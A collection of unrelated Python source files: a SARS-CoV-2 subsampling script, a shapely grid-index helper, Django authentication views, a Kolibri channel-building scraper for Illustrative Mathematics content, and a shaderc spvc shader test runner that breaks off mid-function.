    # an unknown value crashed later with UnboundLocalError on `samples`.
    parser.add_argument('--characteristic', required=True,
                        choices=['Comprehensive', 'Representative'],
                        help='Characteristic of subsampling')
    parser.add_argument('--output', required=True, help='Output directory path')
    args = parser.parse_args()
    # data version
    DATE = '2022-04-16'
    # files required for subsampling
    DIRPATH = args.dirpath
    genome_path = os.path.join(DIRPATH, 'rawdata', 'SARS_CoV_2.csv')
    seq_info_path = os.path.join(DIRPATH, 'infos.tsv')
    haplotype_sequence_path = os.path.join(DIRPATH, 'haplotype_sequence.txt')
    divergent_pathway_path = os.path.join(DIRPATH, 'divergent_pathway.csv')
    infos, target_ids = get_target_ids(seq_info_path, args, genome_path)
    # cap the request at the number of sequences actually in range
    required_sample_num = min(args.size, len(target_ids))
    seqs = read_haplotype_sequence(haplotype_sequence_path, target_ids)
    paths_in_continent = read_path(divergent_pathway_path, target_ids, infos)
    # characteristic of subsampling (argparse guarantees one of the two)
    if args.characteristic == 'Comprehensive':
        samples = com_sampling(required_sample_num, seqs, infos, paths_in_continent)
    else:
        samples = rep_sampling(required_sample_num, seqs, infos, paths_in_continent)
    write_new_file(os.path.join(args.output, 'samples.txt'), samples, DATE, args, target_ids)
# Script entry point.
if __name__ == '__main__':
    main()
|
import numpy as np
from shapely.geometry.multipolygon import MultiPolygon
from ocgis.util.helpers import make_poly
def shapely_grid(dim, rtup, ctup, target=None):
    """Build a regular grid of dim x dim cells covering the given extents.

    :param dim: cell size (grid spacing)
    :param rtup: (min, max) row extent
    :param ctup: (min, max) column extent
    :param target: optional geometry; when given, only cells passing keep()
                   against it are retained
    :returns: MultiPolygon of the grid cells
    """
    def _edges(lo, hi):
        # Consecutive (lower, upper) bound pairs along one axis.
        ticks = np.arange(lo, hi + dim, dim)
        return list(zip(ticks[:-1], ticks[1:]))

    cells = []
    for row_pair in _edges(rtup[0], rtup[1]):
        for col_pair in _edges(ctup[0], ctup[1]):
            cell = make_poly(row_pair, col_pair)
            # Without a target every cell is kept; with one, only overlapping
            # (non-touching) cells survive.
            if target is None or keep(target, cell):
                cells.append(cell)
    return MultiPolygon(cells)
def build_index_grid(dim, target):
    """Build a grid over *target*'s bounding box, keeping only cells that
    overlap the target geometry.

    :param dim: grid cell size
    :param target: geometry whose .bounds define the grid extent
    :returns: MultiPolygon grid from shapely_grid()
    """
    # shapely bounds are (minx, miny, maxx, maxy); rows span y, columns span x.
    minx, miny, maxx, maxy = target.bounds
    return shapely_grid(float(dim), (miny, maxy), (minx, maxx), target=target)
def build_index(target, grid):
    """Index *grid* cells that overlap *target*.

    :returns: dict mapping cell position -> {'box': cell polygon,
              'geom': target clipped to the cell}
    """
    index = {}
    for cell_id, cell in enumerate(grid):
        if not keep(target, cell):
            continue
        index[cell_id] = {'box': cell, 'geom': target.intersection(cell)}
    return index
def keep(target, selection):
    """Return True when *selection* genuinely overlaps *target* -- it
    intersects but does not merely touch at the boundary."""
    return bool(selection.intersects(target) and not selection.touches(target))
def index_intersects(target, index):
    """Return True if *target* overlaps any geometry stored in *index*.

    Each entry is tested cheaply against its bounding cell ('box') first,
    then against the exact clipped geometry ('geom').
    """
    # Fixed: dict.itervalues() is Python 2 only (AttributeError on Python 3);
    # .values() works on both.
    for value in index.values():
        if keep(target, value['box']) and keep(target, value['geom']):
            return True
    return False
################################################################################
#sc = ShpCabinet()
#geom = sc.get_geom_dict('state_boundaries',{'id':[16]})[0]['geom']
#geom = sc.get_geom_dict('world_countries')
#geom = union_geom_dicts(geom)[0]['geom']
#
##target = Point(-99.77,41.22)
#target = make_poly((40,41),(-99,-98))
#
#dims = np.arange(10,100,10)
#build_times = []
#int_times = []
#for dim in dims.flat:
# print(dim)
#
# t1 = time.time()
# grid = build_index_grid(dim,geom)
# index = build_index(geom,grid)
# t2 = time.time()
# build_times.append(t2-t1)
#
# t1 = time.time()
# index_intersects(target,index)
# t2 = time.time()
# int_times.append(t2-t1)
#
#plt.figure(1)
#plt.subplot(211)
#plt.plot(dims,build_times)
#plt.title('build times')
#
#plt.subplot(212)
#plt.plot(dims,int_times)
#plt.title('intersects times')
#
#plt.show()
#print index_intersects(pt,index)
#import ipdb;ipdb.set_trace()
################################################################################
#rtup = (40.0,50.0)
#ctup = (-120.0,-100.0)
#dim = 5.0
#
#tag = str(datetime.now())
#target = make_poly(rtup,ctup)
#grid = shapely_grid(dim,rtup,ctup)
#index = build_index(target,grid)
#test_in = make_poly((42.17,43.31),(-118.72,-117.52))
#test_out = make_poly((41.10,42.81),(-125.56,-123.58))
#
#print('in')
#print(index_intersects(test_in,index))
#print('out')
#print(index_intersects(test_out,index))
#
#import ipdb;ipdb.set_trace()
#
#shapely_to_shp(target,'target_'+tag)
#shapely_to_shp(grid,'grid_'+tag)
#shapely_to_shp(test_in,'test_in_'+tag)
#shapely_to_shp(test_out,'test_out_'+tag)
#sc = ShpCabinet()
#geom_dict = sc.get_geom_dict('state_boundaries',{'ugid':[25]})
#geom = geom_dict[0]['geom']
#bounds = geom.bounds
#rtup = (bounds[1],bounds[3])
#ctup = (bounds[0],bounds[2])
#grid = shapely_grid(1.0,rtup,ctup,target=geom)
#index = build_index(geom,grid)
#
#import ipdb;ipdb.set_trace()
#
#shapely_to_shp(geom,'geom_'+tag)
#shapely_to_shp(grid,'grid_'+tag) |
from django.contrib.auth import login, authenticate, logout
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from the_things_I_buy.core.verify_key_word_valid import verify_key_word_valid, verify_passwords
from the_things_I_buy_auth.forms import LoginForm, RegisterForm, ResetPswForm
from the_things_I_buy_auth.models import UserKeyWord
def login_user(request):
    """Render the login form (GET) or authenticate and log the user in (POST)."""
    if request.method == "GET":
        context = {
            'login_form': LoginForm()
        }
        return render(request, 'login.html', context)
    else:
        login_form = LoginForm(request.POST)
        if login_form.is_valid():
            username = login_form.cleaned_data['username']
            # Fixed: this line contained a corrupted '<PASSWORD>_form' token;
            # read the password from the validated form data.
            password = login_form.cleaned_data['password']
            user = authenticate(username=username, password=password)
            if user:
                login(request, user)
                return redirect('load home page')
            else:
                # Authentication failed: re-render with a generic error message.
                context = {
                    'wrong_credentials': 'Username and/or password don\'t match. Please try again.',
                    'login_form': login_form
                }
                return render(request, 'login.html', context)
        else:
            return render(request, 'login.html', {'login_form': login_form})
def register_user(request):
    """Render the registration form (GET) or create the user, store their
    recovery key word, and log them in (POST)."""
    if request.method == 'GET':
        return render(request, 'register.html', {'register_form': RegisterForm()})
    register_form = RegisterForm(request.POST)
    if register_form.is_valid():
        new_user = register_form.save()
        # Persist the recovery key word alongside the new account.
        UserKeyWord(key_word=register_form.cleaned_data['key_word'], user=new_user).save()
        login(request, new_user)
        return redirect('load home page')
    context = {'register_form': register_form}
    # Surface field-specific errors under template-friendly names.
    if 'username' in register_form.errors:
        context['username_error'] = register_form.errors['username']
    if 'password2' in register_form.errors:
        context['passwords_error'] = register_form.errors['password2']
    return render(request, 'register.html', context)
def logout_user(request):
    """Log the current user out and redirect to the home page."""
    logout(request)
    return redirect('load home page')
def reset_password(request):
    """Render the password-reset form (GET) or, on POST, verify the user's
    key word and set a new password.

    verify_key_word_valid / verify_passwords may raise ValidationError; its
    message is shown back to the user.
    """
    if request.method == 'GET':
        context = {
            'reset_form': ResetPswForm()
        }
        return render(request, 'reset_psw.html', context)
    else:
        reset_psw_form = ResetPswForm(request.POST)
        if reset_psw_form.is_valid():
            username = reset_psw_form.cleaned_data['username']
            key_word = reset_psw_form.cleaned_data['key_word']
            # NOTE(review): raises User.DoesNotExist for an unknown username --
            # confirm the form guarantees the user exists.
            current_user = User.objects.get(username=username)
            try:
                if verify_key_word_valid(current_user, key_word):
                    if verify_passwords(reset_psw_form):
                        new_psw = reset_psw_form.cleaned_data['password2']
                        # Store the salted hash, never the raw password.
                        # Fixed: was assigning a corrupted '<PASSWORD>' placeholder
                        # instead of the hashed value.
                        current_user.password = make_password(new_psw)
                        current_user.save()
                        return redirect('login')
            except ValidationError as ex:
                context = {
                    'error_msg': ex.message,
                    'reset_form': reset_psw_form
                }
                return render(request, 'reset_psw.html', context)
            # Verification returned falsy without raising: re-render the form
            # instead of falling through and returning None (which would be a
            # server error in Django).
            return render(request, 'reset_psw.html', {'reset_form': reset_psw_form})
        else:
            context = {
                'reset_form': reset_psw_form
            }
            return render(request, 'reset_psw.html', context)
|
<reponame>learningequality/sushi-chef-openupresources
#!/usr/bin/env python
import os
import sys
sys.path.append(os.getcwd()) # Handle relative imports
#from utils import data_writer, path_builder # , downloader -- we no longer use downloader due to session issues
from le_utils.constants import licenses, exercises, content_kinds, file_formats, format_presets, languages
import requests
from ricecooker.classes import nodes
from ricecooker.classes.files import HTMLZipFile
from ricecooker.chefs import SushiChef
""" Additional imports """
###########################################################
import logging
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import re
import localise
#import ricecooker
""" Run Constants"""
###########################################################
CHANNEL_NAME = "Illustrative Mathematics" # Name of channel
CHANNEL_SOURCE_ID = "openupresources" # Channel's unique id
# TODO: what is CHANNEL_DOMAIN?
CHANNEL_DOMAIN = "<EMAIL>" # Who is providing the content
CHANNEL_LANGUAGE = "en" # Language of channel
CHANNEL_DESCRIPTION = "Grade 6-8 Math: A problem-based core program that sparks unparalleled levels of student engagement." # Description of the channel (optional)
CHANNEL_THUMBNAIL = None # Local path or url to image file (optional)
#PATH = path_builder.PathBuilder(channel_name=CHANNEL_NAME) # Keeps track of path to write to csv
WRITE_TO_PATH = "{}{}{}.zip".format(os.path.dirname(os.path.realpath(__file__)), os.path.sep, CHANNEL_NAME) # Where to generate zip file
USERNAME = os.getenv('USERNAME')
PASSWORD = os.getenv('PASSWORD')
# make sure we're using the same session as localise is! (geogebra can use a different one, that's fine)
session = localise.session # I wanted to use downloader.DOWNLOAD_SESSION, but that doesn't work...
""" Additional Constants """
###########################################################
# only add keys we actively care about
"""METADATA_KEYS = ['content_id', 'author', 'lang_id', 'license', 'copyright_holder']
LICENSE_LOOKUP = {"CC BY-NC-SA": licenses.CC_BY_NC_SA,
"CC BY-NC": licenses.CC_BY_NC,
"CC BY": licenses.CC_BY,
"Public Domain": licenses.PUBLIC_DOMAIN
}
""" # TODO - remove if unused
# Set up logging tools
LOGGER = logging.getLogger()
#__logging_handler = logging.StreamHandler()
#LOGGER.addHandler(__logging_handler)
#LOGGER.setLevel(logging.INFO)
# License to be used for content under channel
CHANNEL_LICENSE = licenses.CC_BY_NC_SA
GRADES = [6]#,7,8]
UNITS = [1,2,3,4,5,6,7,8,9]
BASE_URL = 'https://im.openupresources.org/{grade}/{target}'
def login():
    """Sign in to auth.openupresources.org using the USERNAME/PASSWORD env
    vars and verify that restricted teacher material is then reachable.

    Raises AssertionError if sign-in or the access check fails.
    """
    # Handle Login
    sign_in_url = "https://auth.openupresources.org/users/sign_in"
    # get sign-in page
    bs = BeautifulSoup(session.get(sign_in_url).text, 'html.parser')
    form = bs.find("form")
    inputs = form.find_all("input")
    data = {}
    # what we actually care about here is the auth-token.
    # All hidden form inputs (including the CSRF token) are echoed back.
    for i in inputs:
        data[i.attrs['name']] = i.attrs.get('value')
    data['user[email]'] = USERNAME
    data['user[password]'] = PASSWORD
    posted_response = session.post(sign_in_url, data=data)
    assert "Signed in successfully" in posted_response.text
    # this step is apparently absolutely critical -- click the big button on the success page!
    session.get("https://auth.openupresources.org/register/materials")
    # check it's all OK.
    test_response = session.get("https://im.openupresources.org/7/teachers/5.html")
    assert "sign up as an educator" not in test_response.text
    assert "Rational Number" in test_response.text
    localise.test_login()
""" Main Class """
class OpenUpChef(SushiChef):
    """Sushi chef that builds the Illustrative Mathematics (Open Up Resources)
    channel: one topic per grade, each holding localised HTML5 app nodes."""
    channel_info = {
        'CHANNEL_SOURCE_DOMAIN': 'im.openupresources.org', # who is providing the content (e.g. learningequality.org)
        'CHANNEL_SOURCE_ID': 'im_openupresources', # channel's unique id
        'CHANNEL_TITLE': 'Illustrative Mathematics',
        'CHANNEL_LANGUAGE': 'en', # Use language codes from le_utils
        # 'CHANNEL_THUMBNAIL': 'https://im.openupresources.org/assets/im-logo.svg', # (optional) local path or url to image file
        'CHANNEL_DESCRIPTION': 'Grade 6-8 Math: A problem-based core program that sparks unparalleled levels of student engagement.', # (optional) description of the channel (optional)
    }
    def construct_channel(self, **kwargs):
        """Build the channel tree: a Grade topic per entry in GRADES, each
        with the teacher course guide and the first student lesson, localised
        into standalone HTML5 zips."""
        # create channel
        channel = self.get_channel(**kwargs)
        for grade in GRADES:
            grade_node = nodes.TopicNode(source_id=str(grade),
                                         title="Grade {grade}".format(grade=grade),
                                         description="",
                                         )
            channel.add_child(grade_node)
            # Teacher course guide (single page per year).
            filename = localise.make_local(BASE_URL.format(grade=grade, target='teachers')+"/teacher_course_guide.html")
            print(filename)
            course_guide_node = nodes.HTML5AppNode(source_id="{grade}-teachers-teacher_course_guide".format(grade=grade),
                                                   title="Grade {grade} Teacher Course Guide".format(grade=grade),
                                                   license=licenses.CC_BY_NC_SA,
                                                   # Fixed: was a corrupted '<NAME>' placeholder; use the same
                                                   # holder as the student node below.
                                                   copyright_holder="Open Up Resources",
                                                   files=[HTMLZipFile(filename)],
                                                   )
            grade_node.add_child(course_guide_node)
            # First student lesson (unit 1, lesson 1).
            filename = localise.make_local(BASE_URL.format(grade=grade, target="students")+"/1/1.html")
            print(filename)
            # Renamed from the shadowing second `course_guide_node`.
            lesson_node = nodes.HTML5AppNode(source_id="{grade}-students-1-1".format(grade=grade),
                                             title="Grade {grade} 1-1".format(grade=grade),
                                             license=licenses.CC_BY_NC_SA,
                                             copyright_holder="Open Up Resources",
                                             files=[HTMLZipFile(filename)],
                                             )
            grade_node.add_child(lesson_node)
        # Site-structure notes for future expansion:
        # 6/teachers/1.html -- has description of this topic; has drop down list of lessons within it
        # 6/teachers/1/1.html -- Is a lesson plan.
        # 6/teachers/1/assessments/unit_assessments.html -- broken
        # 6/teachers/1/practice_problems.html -- practice problems for all lessons w/solutons
        # 6/teachers/1/downloads.html -- 7x links to pdfs/zips of pdfs
        # 6/teachers/1/family_materials.html -- same as family? (YES) topicwide
        # 6/teachers/teacher_course_guide.html -- single page per year
        # 6/families/1.html -- same as teachers / family materials
        # 6/students/1/1.html -- is student resources.
        # 6/students/1/practice_problems.html - nothing complex
        # 6/students/1/glossary.html - nothing complex
        # 6/students/1/my_reflections.html - nothing complex
        return channel
#def run(): # args, options
# pass
#def main():
# pass
def make_channel():
    """Instantiate the chef and run it, uploading the channel to Kolibri
    Studio using the token from the environment."""
    chef_args = {
        'token': os.environ['KOLIBRI_STUDIO_TOKEN'],  # must be set in the environment
        'reset': True,
        'verbose': True,
    }
    OpenUpChef().run(chef_args, {})
# Module-level script body: sign in first, then build and upload the channel.
login()
make_channel()
exit()
|
# Copyright 2019 The Shaderc Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run the spirv-cross tests on spvc."""
from multiprocessing import Pool
import argparse
import filecmp
import itertools
import os
import re
import subprocess
import sys
import tempfile
class TestEnv:
    """Container for cross-test environmental data and operations."""
    def __init__(self, script_args):
        """Takes in the output of ArgumentParser.parse_args()"""
        self.dry_run = script_args.dry_run        # log commands instead of running them
        self.verbose = script_args.verbose        # extra diagnostic logging
        self.give_up = script_args.give_up        # abort the whole run on first failure
        self.cross_dir = script_args.cross_dir    # SPIRV-Cross checkout (inputs + references)
        self.spvc = script_args.spvc              # tool binary paths
        self.spirv_as = script_args.spirv_as
        self.spirv_opt = script_args.spirv_opt
        self.glslang = script_args.glslang
        # When False, '--no-validate' is appended to every spvc invocation.
        self.run_spvc_with_validation = True
    def log_unexpected(self, test_list, test_result):
        """Log list of test cases with unexpected outcome."""
        if not len(test_list):
            log_string = 'Encountered 0 unexpected ' + test_result
        else:
            log_string = 'Encountered ' + format(
                len(test_list)) + ' unexpected ' + test_result + '(s):\n'
            test_list = ['\t{}'.format(test) for test in test_list]
            log_string += '\n'.join(test_list)
        print(log_string)
    def log_missing_failures(self, failures):
        """Log list of known failing test cases that were not run."""
        if not len(failures):
            log_string = 'Encountered 0 missing failures'
        else:
            log_string = 'Encountered {} missing failures(s):\n'.format(
                len(failures))
            failures = ['\t{}'.format(failure) for failure in failures]
            log_string += '\n'.join(failures)
        print(log_string)
    def log_failure(self, shader, optimize):
        """Log a test case failure (only in verbose mode)."""
        if self.verbose:
            log_string = 'FAILED {}, optimize = {}'.format(shader, optimize)
            print(log_string)
    def log_command(self, cmd):
        """Log calling a command."""
        if self.verbose:
            # make sure it's all strings
            cmd = [str(x) for x in cmd]
            # first item is the command path, keep only last component
            cmd[0] = os.path.basename(cmd[0])
            # if last item is a path in SPIRV-Cross dir, trim that dir
            if cmd[-1].startswith(self.cross_dir):
                cmd[-1] = cmd[-1][len(self.cross_dir) + 1:]
            log_string = ' '.join(cmd) + '\n'
            print(log_string)
    def check_output(self, cmd):
        """Quietly run a command.
        Returns status of |cmd|, output of |cmd|.
        In dry-run mode the command is only logged and (True, None) returned.
        """
        self.log_command(cmd)
        if self.dry_run:
            return True, None
        try:
            out = subprocess.check_output(cmd)
            return True, out
        except subprocess.SubprocessError as e:
            # NOTE(review): not every SubprocessError subclass carries
            # `.output` (CalledProcessError/TimeoutExpired do) -- confirm this
            # cannot raise AttributeError for other subclasses.
            return False, e.output
    def run_spirv_as(self, inp, out, flags):
        """Run spirv-as.
        Returns status of spirv-as, output of spirv-as.
        """
        return self.check_output([self.spirv_as] + flags + ['-o', out, inp])
    def run_spirv_opt(self, inp, out, flags):
        """Run spirv-opt.
        Returns status of spirv-out, output of spirv-out.
        """
        return self.check_output([self.spirv_opt] + flags + ['--skip-validation', '-O', '-o', out, inp])
    def run_glslang_compile(self, inp, out, flags):
        """Run glslangValidator as a compiler.
        Returns status of glslangValidator, output of glslangValidator.
        """
        return self.check_output([self.glslang] + flags + ['-o', out, inp])
    def run_spvc(self, inp, out, flags):
        """Run spvc.
        Returns status of spvc, output of spvc. Exits entirely if spvc
        fails and give_up flag is set.
        """
        if not self.run_spvc_with_validation:
            flags.append('--no-validate')
        status, output = self.check_output(
            [self.spvc] + flags + ['-o', out, '--source-env=vulkan1.1', '--target-env=vulkan1.1', inp])
        if not status and self.give_up:
            print('Bailing due to failure in run_spvc with give_up set')
            sys.exit()
        return status, output
    def check_reference(self, result, shader, optimize):
        """Compare result file to reference file and count matches.
        Returns the result of the comparison and the reference file
        being used. Exits entirely if the comparison fails and the
        give_up flag is set.
        """
        # Optimized runs compare against the references under reference/opt/.
        if optimize:
            reference = os.path.join('reference', 'opt', shader)
        else:
            reference = os.path.join('reference', shader)
        self.log_command(['reference', reference, optimize])
        # shallow=False: compare file contents, not just os.stat signatures.
        if self.dry_run or filecmp.cmp(
                result, os.path.join(self.cross_dir, reference), False):
            return True, reference
        elif self.give_up:
            print('Bailing due to failure in check_reference with give_up set')
            sys.exit()
        return False, reference
    def compile_input_shader(self, shader, filename, optimize):
        """Prepare Vulkan binary for input to spvc.
        The test input is either:
        - Vulkan text, assembled with spirv-as
        - GLSL, converted with glslang
        Optionally pass through spirv-opt.
        Returns the status of the operation, and the temp file that the shader
        was compiled to.
        """
        _, tmpfile = tempfile.mkstemp()
        shader_path = os.path.join(self.cross_dir, shader)
        if '.asm.' in filename:
            flags = ['--target-env', 'vulkan1.1']
            if '.preserve.' in filename:
                flags.append('--preserve-numeric-ids')
            result, _ = self.run_spirv_as(shader_path, tmpfile, flags)
        else:
            result, _ = self.run_glslang_compile(shader_path, tmpfile, [
                '--target-env', 'vulkan1.1', '-V'])
        if optimize:
            result, _ = self.run_spirv_opt(tmpfile, tmpfile, [])
        return result, tmpfile
def remove_files(*filenames):
    """Remove files and be quiet if they don't exist or can't be removed.

    Call sites may pass None (e.g. test_glsl passes output=None after a spvc
    failure); the TypeError guard covers that.
    """
    for name in filenames:
        try:
            os.remove(name)
        except (OSError, TypeError):
            # Deliberately best-effort, but no longer a bare `except:` that
            # would also swallow KeyboardInterrupt/SystemExit.
            pass
def test_glsl(test_env, shader, filename, optimize):
    """Test spvc producing GLSL the same way SPIRV-Cross is tested.
    There are three steps: compile input, convert to GLSL, check result.
    Returns a list of successful tests and a list of failed tests.
    """
    successes = []
    failures = []
    # Files with .nocompat. in their name are known to not work.
    if '.nocompat.' in filename:
        return [], []
    # '.noopt.' and '.invalid.' shaders are never run through spirv-opt.
    status, input_shader = test_env.compile_input_shader(
        shader, filename, optimize and ('.noopt.' not in filename) and ('.invalid.' not in filename))
    if not status:
        remove_files(input_shader)
        failures.append((shader, optimize))
        test_env.log_failure(shader, optimize)
        return successes, failures
    # Run spvc to convert Vulkan to GLSL. Up to two tests are performed:
    # - Regular test on most files
    # - Vulkan-specific test on Vulkan test input
    # Flags below mirror SPIRV-Cross's filename-token conventions.
    flags = ['--entry=main', '--language=glsl']
    if '.noeliminate' not in filename:
        flags.append('--remove-unused-variables')
    if '.legacy.' in filename:
        flags.extend(['--glsl-version=100', '--es'])
    if '.flatten.' in filename:
        flags.append('--flatten-ubo')
    if '.flatten_dim.' in filename:
        flags.append('--flatten-multidimensional-arrays')
    if '.push-ubo.' in filename:
        flags.append('--glsl-emit-push-constant-as-ubo')
    if '.sso.' in filename:
        flags.append('--separate-shader-objects')
    # Output path derives from the unique temp input file, so parallel
    # workers cannot collide.
    output = input_shader + filename
    if '.vk.' in filename:
        status, _ = test_env.run_spvc(
            input_shader, output, flags + ['--vulkan-semantics'])
    else:
        status, _ = test_env.run_spvc(input_shader, output, flags)
    if not status:
        output = None
    if output:
        # Vulkan-semantics runs compare against the '.vk'-suffixed reference.
        reference_shader = shader
        if '.vk.' in filename:
            reference_shader = shader + '.vk'
        result, _ = test_env.check_reference(
            output, reference_shader, optimize)
        if result:
            successes.append((shader, optimize))
        else:
            failures.append((shader, optimize))
            test_env.log_failure(shader, optimize)
    else:
        failures.append((shader, optimize))
        test_env.log_failure(shader, optimize)
    # remove_files tolerates output being None (spvc-failure case above).
    remove_files(input_shader, output)
    return successes, failures
def lookup(table, filename):
    """Search first column of 'table' to return item from second column.
    The last item will be returned if nothing earlier matches.
    """
    needles = table[0::2]
    values = table[1::2]
    for needle, value in zip(needles, values):
        if '.{}.'.format(needle) in filename:
            return value
    # Nothing matched: fall back to the table's final value (by convention
    # the default row with an empty needle).
    return values[-1]
# Lookup tables for lookup(): flattened (needle, value) pairs. The filename
# is scanned for '.<needle>.'; the final ''-needle row is the default because
# lookup() returns the last value when nothing earlier matches.
shader_models = (
    'sm60', '60',
    'sm51', '51',
    'sm30', '30',
    '', '50',
)
# --msl-version values (MAJOR*10000 + MINOR*100 encoding).
msl_standards = (
    'msl2', '20000',
    'msl21', '20100',
    'msl11', '10100',
    '', '10200',
)
# Metal compiler -std flags for iOS targets.
msl_standards_ios = (
    'msl2', '-std=ios-metal2.0',
    'msl21', '-std=ios-metal2.1',
    'msl11', '-std=ios-metal1.1',
    'msl10', '-std=ios-metal1.0',
    '', '-std=ios-metal1.2',
)
# Metal compiler -std flags for macOS targets.
msl_standards_macos = (
    'msl2', '-std=macos-metal2.0',
    'msl21', '-std=macos-metal2.1',
    'msl11', '-std=macos-metal1.1',
    '', '-std=macos-metal1.2',
)
def test_msl(test_env, shader, filename, optimize):
    """Test spvc producing MSL the same way SPIRV-Cross is tested.
    There are three steps: compile input, convert to MSL, check result.
    Returns a list of successful tests and a list of failed tests.
    """
    successes = []
    failures = []
    # Files with .nocompat. in their name are known to not work.
    if '.nocompat.' in filename:
        return [], []
    status, input_shader = test_env.compile_input_shader(
        shader, filename, optimize and ('.noopt.' not in filename))
    if not status:
        remove_files(input_shader)
        failures.append((shader, optimize))
        test_env.log_failure(shader, optimize)
        return successes, failures
    # Run spvc to convert Vulkan to MSL.
    # Flags mirror SPIRV-Cross's filename-token conventions.
    flags = ['--entry=main', '--language=msl',
             '--msl-version=' + lookup(msl_standards, filename)]
    if '.swizzle.' in filename:
        flags.append('--msl-swizzle-texture-samples')
    if '.ios.' in filename:
        flags.append('--msl-platform=ios')
    if '.pad-fragment.' in filename:
        flags.append('--msl-pad-fragment-output')
    if '.capture.' in filename:
        flags.append('--msl-capture-output')
    if '.domain.' in filename:
        flags.append('--msl-domain-lower-left')
    # NOTE(review): the next two test `shader` (the relative path) rather than
    # `filename` like the flags above -- confirm this is intentional.
    if '.argument.' in shader:
        flags.append('--msl-argument-buffers')
    if '.discrete.' in shader:
        flags.append('--msl-discrete-descriptor-set=2')
        flags.append('--msl-discrete-descriptor-set=3')
    output = input_shader + filename
    status, _ = test_env.run_spvc(input_shader, output, flags)
    if not status:
        remove_files(input_shader)
        failures.append((shader, optimize))
        test_env.log_failure(shader, optimize)
        return successes, failures
    # Check result.
    if output:
        result, reference = test_env.check_reference(output, shader, optimize)
        if result:
            successes.append((shader, optimize))
        else:
            failures.append((shader, optimize))
            test_env.log_failure(shader, optimize)
    else:
        failures.append((shader, optimize))
        test_env.log_failure(shader, optimize)
    remove_files(input_shader, output)
    return successes, failures
def test_hlsl(test_env, shader, filename, optimize):
    """Test spvc producing HLSL the same way SPIRV-Cross is tested.
    There are three steps: compile input, convert to HLSL, check result.
    Returns a list of successful tests and a list of failed tests.
    """
    successes = []
    failures = []
    # Files with .nocompat. in their name are known to not work.
    if '.nocompat.' in filename:
        return [], []
    status, input_shader = test_env.compile_input_shader(
        shader, filename, optimize and ('.noopt.' not in filename))
    if not status:
        remove_files(input_shader)
        failures.append((shader, optimize))
        test_env.log_failure(shader, optimize)
        return successes, failures
    # Run spvc to convert Vulkan to HLSL.
    # Shader model is chosen from the filename via the shader_models table.
    output = input_shader + filename
    status, _ = test_env.run_spvc(input_shader, output, ['--entry=main', '--language=hlsl',
                                                         '--hlsl-enable-compat', '--shader-model=' + lookup(shader_models, filename)])
    if not status:
        remove_files(input_shader)
        failures.append((shader, optimize))
        test_env.log_failure(shader, optimize)
        return successes, failures
    # `output` is always truthy here (a non-empty path) since the failure
    # case returned above; the check is kept for symmetry with test_glsl.
    if output:
        # TODO(bug 649): Log dxc run here
        result, _ = test_env.check_reference(output, shader, optimize)
        if result:
            successes.append((shader, optimize))
        else:
            failures.append((shader, optimize))
            test_env.log_failure(shader, optimize)
    else:
        failures.append((shader, optimize))
        test_env.log_failure(shader, optimize)
    remove_files(input_shader, output)
    return successes, failures
def test_reflection(test_env, shader, filename, optimize):
"""Currently a no-op test. Needs to be implemented.
Returns a tuple indicating the passed in test has failed.
"""
test_env.log_failure(shader, optimize)
return [], [(shader, optimize)], []
# TODO(bug 650): Implement this test
# TODO(bug 651): Allow our own tests, not just spirv-cross tests.
# Each entry maps a SPIRV-Cross test directory to the handler that converts
# and checks its shaders, plus whether to run them through spirv-opt first.
test_case_dirs = (
    # directory function optimize
    ('shaders', test_glsl, False),
    ('shaders', test_glsl, True),
    ('shaders-no-opt', test_glsl, False),
    ('shaders-msl', test_msl, False),
    ('shaders-msl', test_msl, True),
    ('shaders-msl-no-opt', test_msl, False),
    ('shaders-hlsl', test_hlsl, False),
    ('shaders-hlsl', test_hlsl, True),
    ('shaders-hlsl-no-opt', test_hlsl, False),
    ('shaders-reflection', test_reflection, False),
)
def work_function(work_args):
    """Unpack one queued test case and dispatch it to its handler.

    *work_args* is (test_function, test_env, shader, filename, optimize),
    packed into a single tuple so Pool.map can pass it as one argument.
    """
    handler, env, shader, filename, optimize = work_args
    return handler(env, shader, filename, optimize)
def main():
    """Drive the spvc shader test suite.

    Parses command-line options, collects shader test cases from the
    SPIRV-Cross (and, with --run-spvc-tests, the spvc) test trees, runs
    them in a process pool twice (with and without validation), and
    compares the outcomes against the known-failure / known-invalid lists.

    Returns a truthy value when unexpected results were seen (used as the
    process exit status by the caller), falsy on a fully expected run.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-v', '--verbose', dest='verbose',
                        action='store_true', help='Enable additional diagnostic logging')
    parser.add_argument('-n', '--dry-run', dest='dry_run',
                        action='store_true', help='Do not execute commands')
    parser.add_argument('-g', '--give-up', dest='give_up',
                        action='store_true', help='Quit after first failure')
    parser.add_argument('-f', '--test-filter', dest='test_filter', action='store',
                        metavar='<test filter regex>', help='Only run tests that contain given regex string')
    parser.add_argument('-j', '--jobs', dest='jobs', type=int, default=0, action='store',
                        metavar='<number of processes to use>', help='Use as many processes as specified, 0 indicates let the script decide.')
    parser.add_argument('--update_known_failures', dest='update_known_failures',
                        action='store_true', help='Write out the failures to spvc/test/known_failures')
    parser.add_argument('--run-spvc-tests', dest='run_spvc_tests',
                        action='store_true', help='Run tests stored in spvir-cross and spvc directory using spvc parser')
    parser.add_argument('spvc', metavar='<spvc executable>')
    parser.add_argument('spirv_as', metavar='<spirv-as executable>')
    parser.add_argument('spirv_opt', metavar='<spirv-opt executable>')
    parser.add_argument('glslang', metavar='<glslangValidator executable>')
    parser.add_argument('cross_dir', metavar='<SPIRV-cross directory>')
    parser.add_argument('spvc_test_dir', metavar='<spvc test directory>')
    script_args = parser.parse_args()

    test_env = TestEnv(script_args)

    test_regex = None
    if script_args.test_filter:
        print('Filtering tests using \'{}\''.format(script_args.test_filter))
        # With a filter active, absent known failures are expected, so the
        # missing-failure check is skipped below.
        print('Will not check for missing failures')
        test_regex = re.compile(script_args.test_filter)

    # Adding tests:
    # Walk SPIRV-Cross test directory and add files to tests list
    # if --run_spvc_tests, also walk spvc test directory and add them to tests list
    tests = []
